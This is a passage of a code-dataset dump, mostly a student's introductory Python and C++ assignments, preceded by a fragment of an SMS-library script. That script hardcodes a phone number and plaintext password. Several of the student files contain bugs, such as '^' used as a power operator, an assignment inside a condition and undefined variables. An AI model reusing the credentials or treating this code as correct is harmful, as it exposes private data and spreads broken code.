"text": "#!/usr/bin/env python\nimport sys,os\n\nAPP_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(APP_PATH);\n\nfrom PFetion import Fetion\n\nfetion = Fetion('15821121753', 'lovexx1314')\n\nfetion.send(sys.argv[1], sys.argv[2])\n"
},
{
"alpha_fraction": 0.6209385991096497,
"alphanum_fraction": 0.7075812220573425,
"avg_line_length": 26.799999237060547,
"blob_id": "006948af940a85fd60305905f8422f578db2fbfd",
"content_id": "3d4c7df6146976b4d2eae2b9be51bff0526eff3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 10,
"path": "/test/simplesend.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
"text": "import sys,os\n\nAPP_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(APP_PATH);\n\nfrom PyWapFetion import Fetion, send2self, send\n\nto = \"15821121753\"\nsend2self(\"15821121753\", \"xxxx\", \"LiXiu, Ni kan dao le ma ?\");\nprint \"Sent Message To %s\" %(to)"
},
{
"alpha_fraction": 0.6426858305931091,
"alphanum_fraction": 0.6570743322372437,
"avg_line_length": 19.850000381469727,
"blob_id": "dbeeb631690e92b626518be18cc5ef4c36c212df",
"content_id": "0e206bc50f0121ac85592f31d5d11236220b5ec2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 20,
"path": "/PFetion/__init__.py",
"repo_name": "jackey/PFetion",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nfrom __future__ import with_statement\n\n__name__ = 'PFetion'\n__version__ = '0.9.4'\n__author__ = 'whtsky'\n__website__ = 'https://github.com/jackey/PFetion'\n__license__ = 'MIT'\n\nfrom Fetion import Fetion\n\n\ndef send2self(mobile, password, message):\n x = Fetion(mobile, password)\n x.send2self(message)\n\n\ndef send(mobile, password, to, message):\n x = Fetion(mobile, password)\n x.send(to, message)\n"
}
] | 4 |
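PFetion/__init__.py above exports both one-shot helpers and the Fetion class; bin/sms.py uses the class form. A usage sketch of that API (the phone numbers and password are placeholders, and the code is Python 2 like the library itself):

from PFetion import Fetion, send2self, send

# one-shot helpers: log in, send, done
send2self('13800000000', 'password', 'note to self')
send('13800000000', 'password', '13900000000', 'hello')

# or hold a session, as bin/sms.py does
fetion = Fetion('13800000000', 'password')
fetion.send('13900000000', 'hello again')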
EricDittus/csci127-assignments
|
https://github.com/EricDittus/csci127-assignments
|
931d681dec9a959a06e90fc2ea3b458fd7d2e2d7
|
85ad418c3481ea1692816ffc00d8dd4e3cffff58
|
60e70f6dd98d84423aadab4f0ad68af165910969
|
refs/heads/master
| 2021-08-22T22:23:49.772209 | 2018-12-20T15:34:24 | 2018-12-20T15:34:24 | 147,669,142 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5194805264472961,
"alphanum_fraction": 0.5627705454826355,
"avg_line_length": 20,
"blob_id": "76aabcd95cc6be849c9ad24761f16bfc5b289633",
"content_id": "3f8c56fbdb2320c1840bee16b3cfc8c6a43fffec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 22,
"path": "/final_1/sum.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n\nint sum;\n\nint sumofsquares(int a, int b){\n int sum = 0;\n for(int i = a; i<=b; i++){\n sum = sum + (i^2);\n }\n return sum;\n}\n\nint main()\n{\n std::cout << \"sumofsquares function test:\\n\\n\";\n std::cout << \"Range 1 to 10\\n\";\n std::cout << sumofsquares(1,10) << std::endl;\n std::cout << \"Range 3 to 5\\n\";\n std::cout << sumofsquares(3,5) << std::endl;\n std::cout << \"Range 20 to 21\\n\";\n std::cout << sumofsquares(20,21) << std::endl;\n}\n"
},
{
"alpha_fraction": 0.5488929748535156,
"alphanum_fraction": 0.5544280409812927,
"avg_line_length": 22.021276473999023,
"blob_id": "741cb07f7f8e59be3a931d400b5b7216c63f5b9d",
"content_id": "581b708dc879e73923df5e4825afb588e5035d02",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 47,
"path": "/final_2/dict.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "\n\ndef addline(d,line):\n my_list = []\n line=line.lower()\n new_line = line.split()\n i=0\n while i <= len(new_line)-1:\n word = new_line[i]\n char=word[0]\n if char in d:\n my_list=d[char]\n my_list.append(word)\n d[char]=my_list\n else:\n my_list = [word]\n d[char]= my_list\n i += 1\n return d\n\nprint(addline({},\"somewhere ooover the rainbooow, way up higghhh\"))\nprint(addline({},\"THERE'S A LAND THAT I DREAM OF\"))\nprint(addline({},\"oNcE In A lUlLuBy\"))\n\n\ndef main():\n d={}\n addline(d,\"apples and octopi love water\")\n addline(d,\"if i were a fish, I would Hate to Swim\")\n addline(d,\"How much Wood\")\n addline(d,\"could a Woodchuck chuck\")\n addline(d,\"if a Woodchuck could chuck wood\")\n return d\n\nprint(main())\n\ndef spellcheck(d,word):\n word=word.lower()\n if word[0] in d:\n if word in d[word[0]]:\n return True\n else:\n return False\n\n else:\n return False\n\nprint(spellcheck(main(),'gotcha'))\nprint(spellcheck(main(),'apples'))\n"
},
{
"alpha_fraction": 0.4595842957496643,
"alphanum_fraction": 0.5265588760375977,
"avg_line_length": 25.8125,
"blob_id": "553e27541ff262e061034049cf9d055cb639ce14",
"content_id": "acb351dfae703918803ea9d9c97c50d6542a3395",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 433,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 16,
"path": "/lab_04/apple.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def countApplesAndOranges(s,t,a,b,apples,oranges):\n num_apples=0\n num_oranges=0\n for d in apples:\n d = a + d\n if s<=d and d<=t:\n num_apples +=1\n for d in oranges:\n d = b + d\n if t>=d and s<=d:\n num_oranges +=1\n print(num_apples)\n print(num_oranges)\n \ncountApplesAndOranges(7,10,4,12,[2,3,-4],[3,-2,-4])\ncountApplesAndOranges(-2,-5,-6,6,[-2,3,10,15],[11,-2]) \n"
},
{
"alpha_fraction": 0.47058823704719543,
"alphanum_fraction": 0.47058823704719543,
"avg_line_length": 15,
"blob_id": "2a640272a2cb7385f194e1a63fbf36899bade3a9",
"content_id": "542e6399206a92943fec1185d8708d7433a33577",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 17,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/testing/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Eric Dittus & Emily Fang\n"
},
{
"alpha_fraction": 0.42032966017723083,
"alphanum_fraction": 0.430402934551239,
"avg_line_length": 18.48214340209961,
"blob_id": "a80eae934a613f661cc50c31dca54d6652b354db",
"content_id": "39f0235a52ad0c73c2f84a048ed392d4cd4f82b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1092,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 56,
"path": "/lab_04/lady.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def happy_ladybugs(L):\n items = uniqueitems(L)\n \n if '_' in items:\n items.remove('_')\n for i in items:\n count = 0\n for j in L:\n if i == j:\n count += 1\n if count <= 1:\n return 'no'\n return 'yes'\n \n elif Full(L):\n return 'yes'\n \n else:\n return 'no'\n \n \ndef Full(L): \n \n previous = L[0]\n consecutive = 1\n if len(L) == 1:\n return False\n \n for i in range(1,len(L)):\n if L[i] == previous:\n consecutive += 1\n elif consecutive > 1:\n if i == len(L) -1:\n return False\n previous = L[i]\n consecutive = 1\n else:\n return False\n return True\n\n\ndef uniqueitems(l):\n \n unique = []\n for i in l: \n if i not in unique:\n unique.append(i)\n \n return unique\n\n\ngames = ['CBAABC','CCAABB','BBBBBB','_','A_B_AA','LFGG','ALACABAZLE',\n 'SS_____SSAA_MMM']\n\nfor each in games:\n print(each,' ',happy_ladybugs(each)) \n"
},
{
"alpha_fraction": 0.48201438784599304,
"alphanum_fraction": 0.48201438784599304,
"avg_line_length": 21.600000381469727,
"blob_id": "91d9603e708b38e8ba032d5ae7b38c1afd64d855",
"content_id": "859b038e8f490cf6f3e78c5c98a21d4d7dd61480",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/hw_04/chinese.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def chinese_is_awesome(answer):\n if answer == \"yes\":\n print(\"true dat\")\n \nchinese_is_awesome(\"yes\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.7384615540504456,
"alphanum_fraction": 0.7384615540504456,
"avg_line_length": 63,
"blob_id": "9bacb73bcde84e58137f6bde4026f8dd53e8ad8c",
"content_id": "860ac396fefb36113256b624ec7e1f40281424eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 65,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 1,
"path": "/exam_01/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Eric Dittus: My pushing is causing errors that I can't seem to solve\n"
},
{
"alpha_fraction": 0.4469696879386902,
"alphanum_fraction": 0.5,
"avg_line_length": 17.85714340209961,
"blob_id": "81b850396541e9068da6dfdd60c10186815eaffe",
"content_id": "b4bebaf7a3fac5c6c1e58140ed0d3eb454c4aa2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 396,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 21,
"path": "/hw_05/hw_05.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus\ndef filterodd(l):\n i=0\n oddlist=[]\n while i<=len(l)-1:\n if l[i] % 2 is not 0:\n oddlist.append(l[i])\n i = i + 1\n return oddlist\n \nprint(filterodd([1,2,3,4,5,6,7,8]))\n\ndef mapsquare(l):\n i=0\n squaredlist=[]\n while i<=len(l)-1:\n squaredlist.append(l[i]*l[i])\n i = i + 1\n return squaredlist\n\nprint(mapsquare([4,2,5,3,5]))\n"
},
{
"alpha_fraction": 0.5719497203826904,
"alphanum_fraction": 0.5804620981216431,
"avg_line_length": 47.3725471496582,
"blob_id": "75c634560de6b919ce960b885013bdff762466fc",
"content_id": "73140a41c69c034bfffe7885b6fc4bbc7eff5c45",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2467,
"license_type": "no_license",
"max_line_length": 319,
"num_lines": 51,
"path": "/lab_032/madlibs.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus & Chana Abramov\nimport random\nProperNoun=['Irvington','Jerry', 'Elizabeth','Hillside']\nnoun=['greenbeans', 'cars','markers','cologne']\nverb=['died', 'laughed', 'smoked', 'twerked']\nadverb=['merrily','terribly','cryptically','bootyliciously']\nadjective=['fat','childish','soggy','beautiful','muscular']\nanimal=['lion', 'zebra', 'lil piggy', 'hippo', 'house cat', 'fat fly']\nfurniture=['chair', 'bed','desk','mirror', 'a strange painting']\ncountry=['Israel','Cuba','Syria', 'Turkey','Uzbekistan','China']\nlanguage=['Spanish','Hebrew','Mandarin','Cantonese','Russian']\nMadlib= \"There once was a man named <ProperNoun> and he loved to eat <noun> a lot. This man lived in <country> and spoke <language> . He had a <adjective> <animal> as a companion, and his most prized posession in his house was a <adjective> <furniture> . He grew old and <verb> until he layed down <adverb> and <verb> \"\n\ndef MADLIB(Madlib):\n list_madlib = Madlib.split(' ')\n i=0\n space=\" \"\n while i< len(list_madlib)-1:\n if \"<\" in list_madlib[i]:\n if \"ProperNoun\" in list_madlib[i]:\n index = random.randint(0, len(ProperNoun)-1)\n list_madlib[i]=ProperNoun[index]\n if \"noun\" in list_madlib[i]:\n index = random.randint(0, len(noun)-1)\n list_madlib[i]=noun[index]\n if (\"verb\" in list_madlib[i]) and (\"ad\" not in list_madlib[i]):\n index = random.randint(0, len(verb)-1)\n list_madlib[i]=verb[index]\n if \"adverb\" in list_madlib[i]:\n index = random.randint(0,len(adverb)-1)\n list_madlib[i]=adverb[index]\n if \"animal\" in list_madlib[i]:\n index = random.randint(0,len(animal)-1)\n list_madlib[i]=animal[index]\n if \"adjective\" in list_madlib[i]:\n index = random.randint(0,len(adjective)-1)\n list_madlib[i]=adjective[index]\n if \"furniture\" in list_madlib[i]:\n index = random.randint(0,len(furniture)-1)\n list_madlib[i]=furniture[index]\n if \"country\" in list_madlib[i]:\n index = random.randint(0,len(country)-1)\n list_madlib[i]=country[index]\n if \"language\" in list_madlib[i]:\n index = random.randint(0,len(language)-1)\n list_madlib[i]=language[index]\n \n i+=1\n return space.join(list_madlib)\n\nprint(MADLIB(Madlib))\n"
},
{
"alpha_fraction": 0.52949059009552,
"alphanum_fraction": 0.5482573509216309,
"avg_line_length": 24.689655303955078,
"blob_id": "874e4460b8f579e1111346c938d1a7788eb8e93b",
"content_id": "5c0b45718532e3370497e8040d319e485c1e3fb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 29,
"path": "/final_2/plural.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "\ndef countPlurals(line):\n count = 0\n i = 0\n list_line = line.split()\n while i <= len(list_line)-1:\n word = list_line[i]\n if word[-1:] == 's':\n count += 1\n i +=1\n return count\n\nprint(countPlurals(\"there once were astronaughts\"))\nprint(countPlurals(\"s s s s s s s\"))\nprint(countPlurals(\"okays dokeys please give me free candeys\"))\n\ndef notPossesive(line):\n count = 0\n i = 0\n list_line = line.split()\n while i <= len(list_line)-1:\n word = list_line[i]\n if word[-1:] == 's':\n if word[-2:-1] != '\\'':\n count += 1\n i +=1\n return count\n\nprint(notPossesive(\"there were's a mans cats hat's\"))\nprint(notPossesive(\"what's the matters with you's\"))\n"
},
{
"alpha_fraction": 0.4620901644229889,
"alphanum_fraction": 0.5204917788505554,
"avg_line_length": 26.11111068725586,
"blob_id": "5073f376d347a381cebb232f839d560d600970ec",
"content_id": "4d9d4c81eb8bed5fb4de04ee849874a693314347",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 976,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 36,
"path": "/final_1/quad.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <math.h>\nint a,b,c,r,disc;\n\nint discriminant(int a, int b, int c){\n int disc = (b^2)-(4*a*c);\n return disc;\n}\n\nint quadsolve(int a, int b, int c){\n if(discriminant(a,b,c)>=0){\n int r = (sqrt(discriminant(a,b,c)) -(b))/(2*a);\n return r;\n }\n else{return 0;}\n}\n\nint main()\n{\n std::cout << \"discriminant function test:\\n\\n\";\n std::cout << \"a = 3, b = 5, c = 2\\n\";\n std::cout << discriminant(3,5,2) << std::endl;\n std::cout << \"a = 1, b = -2, c = 20\\n\";\n std::cout << discriminant(1,-2,20) << std::endl;\n std::cout << \"a = 0, b = -20, c = -200\\n\";\n std::cout << discriminant(0,-20,-200) << std::endl;\n\n std::cout << \"quadsolve function test:\\n\\n\";\n std::cout << \"a = 3, b = -4, c = -5\\n\";\n std::cout << quadsolve(3,-4,-5) << std::endl;\n std::cout << \"a = 1, b = -2, c = -20\\n\";\n std::cout << quadsolve(1,-2,-20) << std::endl;\n std::cout << \"a = 0, b = -20, c = -200\\n\";\n std::cout << quadsolve(0,-20,-200) << std::endl;\n\n}\n"
},
{
"alpha_fraction": 0.6097015142440796,
"alphanum_fraction": 0.6179104447364807,
"avg_line_length": 24.30188751220703,
"blob_id": "cfd614b76c387063026e9ef18eb30cfd6547553d",
"content_id": "ef5fc0270a36449325448ce2921449f27a2972bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1340,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 53,
"path": "/test/program.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def capitalize(name):\n \"\"\"\n input: name --> a string in the form \"first last\"\n output: returns a string with each of the two words capitalized\n note: this is the one we started in class\n \"\"\"\n FI=name[0]\n FI=FI.capitalize()\n Space=name.find(' ')\n SI=name[Space+1]\n SI=SI.capitalize()\n NewName= FI+name[1:Space]+\" \"+ SI+ name[Space+2:]\n return NewName\n\n\ndef init(name):\n \"\"\"\n Input: name --> a string in the form \"first last\"\n Returns: a string in the form \"F. Last\" where it's a capitalized first inital \n and capitalized last name\n \"\"\"\n FI=name[0].capitalize()\n Space=name.find(' ')\n LI=name[Space+1:].capitalize()\n NewName=FI+\". \"+LI\n return NewName\n\ndef part_pig_latin(name):\n \"\"\"\n Input: A string that is a single lower case word\n Returns: that string in fake pig latin -> move the first letter of the word to the end and add \"ay\"\n so: \"hello\" --> \"ellohay\"\n \"\"\"\n NewWord= name[1:]+name[0]+\"ay\"\n return NewWord\n\ndef make_out_word(string,word):\n tag=string[0:2]+word+string[2:]\n return tag\n \ndef make_tags(first,second):\n tag=\"<\"+first+\">\"+second+\"</\"+first+\">\"\n return tag\n \nprint(capitalize(\"eric dittus\"))\n\nprint(init(\"eric dittus\"))\n\nprint(part_pig_latin(\"eric\"))\n\nprint(make_out_word(\"<<>>\",\"eric\"))\n\nprint(make_tags(\"yay\",\"eric\"))"
},
{
"alpha_fraction": 0.5321375131607056,
"alphanum_fraction": 0.5470852255821228,
"avg_line_length": 22.068965911865234,
"blob_id": "0fe6ced7db2d3609f0671879714426008fc3b9db",
"content_id": "ae614b4a3eb6093a7717118f7d90f93e2d49e99e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 29,
"path": "/exam_01/compress.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#Eric Dittus\ndef compress_word(w):\n i=1\n j=2\n compressed=w[0]\n while i<=len(w)-2:\n letter = w[i:j]\n if letter not in \"aeiouAEIOU\":\n compressed = compressed + letter \n i+=1\n j+=1\n if w[-1] not in \"aeiouAEIOU\":\n last=w[-1]\n compressed = compressed + last\n \n \n return compressed\nprint(compress_word(\"apple\"))\nprint(compress_word(\"Special\"))\n\ndef sentence(line):\n line_list = line.split()\n i=0\n while i<len(line_list):\n line_list[i]=compress_word(line_list[i])\n i+=1\n new_line= \" \".join(line_list)\n return new_line\nprint(sentence(\"I like to eat apple pie.\"))\n"
},
{
"alpha_fraction": 0.4921875,
"alphanum_fraction": 0.5078125,
"avg_line_length": 27.09756088256836,
"blob_id": "7929409d31eca7bb533e16df0cf2bb7e83e95f3d",
"content_id": "e6d01b117377ae09ff7c370daad8e128863758c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1152,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 41,
"path": "/hw_09/guess.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include<iostream>\nusing std::cout;\nusing std::endl;\nint main(){\n int a, b, c, min, max;\n\n std::cout << \"Pick a number from 0 to 99, inclusive.\\n\";\n std::cin >> a;\n min = 0;\n max = 99;\n\n b = (max + min/2);\n\n std::cout << \"Is your number \" << b << \"?\" << std::endl;\n std::cout << \"Input:\" << std::endl;\n std::cout << \"-1: My number is lower, you're bad at this.\" << std::endl;\n std::cout << \"1: My number is higher, you're still bad at this.\" << std::endl;\n std::cout << \"0: You Got It! Wow, that was amazing!\" << std::endl;\n std::cin >> c;\n\n while(c != 0){\n /*b = min + (rand() % static_cast<int>(max - min + 1));*/\n\n if(c = -1){\n max = b;\n\n }\n else{\n min = b;\n }\n b = (max + min)/2;\n std::cout << \"Is your number \" << b << \"?\" << std::endl;\n std::cout << \"Input:\" << std::endl;\n std::cout << \"-1: My number is lower, you're bad at this.\" << std::endl;\n std::cout << \"1: My number is higher, you're still bad at this.\" << std::endl;\n std::cout << \"0: You Got It! Wow, that was amazing!\" << std::endl;\n std::cin >> c;\n }\n std::cout << \"Congrats to me!\" << std::endl;\n return 0;\n}\n"
},
{
"alpha_fraction": 0.4444444477558136,
"alphanum_fraction": 0.4444444477558136,
"avg_line_length": 15,
"blob_id": "94b0d1892fe9ae32419d05a6e219168788e79d10",
"content_id": "2cd12715717d813630bc700f5fa2de064c23a0fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 18,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 1,
"path": "/hw_02/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Anthony Sokolov & Eric Dittus\r\n"
},
{
"alpha_fraction": 0.3523809611797333,
"alphanum_fraction": 0.3880952298641205,
"avg_line_length": 11.352941513061523,
"blob_id": "484ec92db46af6b5c18933fc8017f263a27bd207",
"content_id": "643c6389b087f4effb32e9674d0a52812ae4268f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 34,
"path": "/test/new_lang.cpp",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n\nint main()\n{\n int x = 1;\n int i;\n\n for(i = 1;i < 5;i++){\n x = x * i;\n }\n std::cout << x << \"\\n\";\n\n x = 1;\n i = 1;\n while (i < 5){\n x = x * i;\n i++;\n }\n std::cout << x << \"\\n\";\n\n int r;\n for(r =rand()%100;\n r != 20;\n r=rand()%100){\n std::cout << r << \" \";\n }\n\n void printGreeting(std::string name){\n std::cout << \"Hello\" << name << \"\"\\n\";\n }\n\n return 0;\n\n}\n"
},
{
"alpha_fraction": 0.3835294246673584,
"alphanum_fraction": 0.42588233947753906,
"avg_line_length": 18.31818199157715,
"blob_id": "64d5fdb6779c52ebc568b701655764e81131547e",
"content_id": "92d09db4d6f099500aa58fd2cf9db98137aea415",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 425,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 22,
"path": "/test/practice.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def fizzbuzz(max_num):\n i = 1\n while i <= max_num:\n if (i%5==0):\n if (i%3==0):\n print(\"FIZZBUZZ\")\n else:\n print(\"buzz\")\n if i % 3 == 0:\n if (i%5!=0):\n print(\"fizz\")\n if (i%5!=0) and (i%3!=0):\n print(i)\n i += 1\n\nprint(fizzbuzz(1000))\n\n\ndef didit(name):\n print(name + \" completed this assignment\")\n\nprint(didit(\"Jerry\"))\n"
},
{
"alpha_fraction": 0.7413793206214905,
"alphanum_fraction": 0.8103448152542114,
"avg_line_length": 37.66666793823242,
"blob_id": "826eba51cb3de6f3d180e68d71a0915f7665ace7",
"content_id": "e3fbd2a697e32041faf7d9a462ab7fe223385c63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 3,
"path": "/quiz-01/Readme.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "First, cd into csci127-assignments\nFirst, cd into csci127-assignments\nthen mkdir quiz-01 and then cd into that file\n"
},
{
"alpha_fraction": 0.632016658782959,
"alphanum_fraction": 0.6382536292076111,
"avg_line_length": 25.72222137451172,
"blob_id": "fefd1d1b005b7346f1d7f21aab2d8144641b429f",
"content_id": "1c4b24b729ac780f01a8e23424a5b0e7163b0451",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 18,
"path": "/exam_02/acronym.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def makeacronym(phrase):\n i = 0\n new_phrase=\"\"\n phrase_list=phrase.split(\" \")\n while i < len(phrase_list):\n next_word = phrase_list[i]\n new_phrase = new_phrase + next_word[0]\n i+=1\n print(new_phrase)\n return new_phrase\n\nmakeacronym(\"laugh out loud\")\nmakeacronym(\"Read...fine manual\")\nmakeacronym(\"In my humble opinion\")\nmakeacronym(\"In my not so humble opion\")\nmakeacronym(\"rsthghghSHBBDB HDBHs\")\nmakeacronym(\".........\")\nmakeacronym(\"?!?/\")\n"
},
{
"alpha_fraction": 0.6524432301521301,
"alphanum_fraction": 0.6524432301521301,
"avg_line_length": 40.514286041259766,
"blob_id": "50c5afd330457fea7b223903a77b7f2f8bf65af3",
"content_id": "644a36ad3f10be9b5275634031466c534818be46",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1453,
"license_type": "no_license",
"max_line_length": 323,
"num_lines": 35,
"path": "/hw_07/madlibs.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "import random\n\nsentence = \"There once was a man named <ProperNoun> and he loved to eat <noun> a lot. This man lived in <country> and spoke <language> . He had a <adjective> <animal> as a companion, and his most prized posession in his house was a <adjective> <furniture> . He grew old and <verb> until he layed down <adverb> and <verb> \"\nProperNoun=['Irvington','Jerry', 'Elizabeth','Hillside']\nnoun=['greenbeans', 'cars','markers','cologne']\nverb=['died', 'laughed', 'smoked', 'twerked']\nadverb=['merrily','terribly','cryptically','bootyliciously']\nadjective=['fat','childish','soggy','beautiful','muscular']\nanimal=['lion', 'zebra', 'lil piggy', 'hippo', 'house cat', 'fat fly']\nfurniture=['chair', 'bed','desk','mirror', 'strange painting']\ncountry=['Israel','Cuba','Syria', 'Turkey','Uzbekistan','China']\nlanguage=['Spanish','Hebrew','Mandarin','Cantonese','Russian']\n\ncategory = ['<ProperNoun>','<noun>','<verb>','<adverb>','<adjective>','<animal>','<furniture>','<country>','<language>']\nwords = [ProperNoun,noun,verb,adverb,adjective,animal,furniture,country,language]\n\ndictionary = {}\n\nfor i, j in zip(category, words):\n dictionary[i] = j\n\n\ndef MADLIB(s,d):\n \n product = []\n d['<language>'] = [random.choice(d['<language>'])]\n \n for i in s.split():\n if i in d:\n product.append(random.choice(d[i]))\n else:\n product.append(i)\n return ' '.join(product)\n\nprint(MADLIB(sentence, dictionary))\n"
},
{
"alpha_fraction": 0.4455958604812622,
"alphanum_fraction": 0.4650259017944336,
"avg_line_length": 21.705883026123047,
"blob_id": "756d0c853b4bd3d7d7ffa86cc75be72a2f94694f",
"content_id": "43bd567a3581dce51b0a998eb5122fd115730b2a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 772,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 34,
"path": "/exam_02/rle.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "def encode(stringy):\n i = 0\n new_list = []\n while i < len(stringy):\n count=1\n curent_letter = stringy[i]\n j = 0\n while stringy[i] == stringy[i+1]:\n item=[]\n count += 1\n item[0]=curent_letter\n item[1]=counts\n new_list[j] = item\n j+=1\n i+=1\n \n new_list[j]=item\n return new_list\nprint(encode(\"abbaaacddaaa\"))\nprint(encode(\"abcd\"))\nprint(encode(\"ooooooo\"))\n\ndef decode(new_list):\n word = \"\"\n i = 0\n while i < len(new_list):\n item =new_list[i]\n j = 0\n while j <= item[1]:\n word = \"\" + item[0]\n j +=1\n i += 1\nprint(decode(encode(\"abbaaacddaaa\")))\nprint(decode(encode(\"yahhyayayay\")))\n"
},
{
"alpha_fraction": 0.550000011920929,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 17,
"blob_id": "27a6b477aceab0c3b80ecec8e7a955f88abeceaf",
"content_id": "eeaa4e3dd613442db9bb4a4d7d7cbd25b036830e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 20,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 1,
"path": "/hw_03/README.md",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
"text": "Eric Dittus and Shanjida Kamal\r\n"
},
{
"alpha_fraction": 0.5181723833084106,
"alphanum_fraction": 0.5295950174331665,
"avg_line_length": 22.487804412841797,
"blob_id": "78263f14412ac825d4d0d1f19f4517e8f88472b3",
"content_id": "74025d3a513bb395d733ab5ab4f62080b19dc3fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 41,
"path": "/final_2/scrabble.py",
"repo_name": "EricDittus/csci127-assignments",
"src_encoding": "UTF-8",
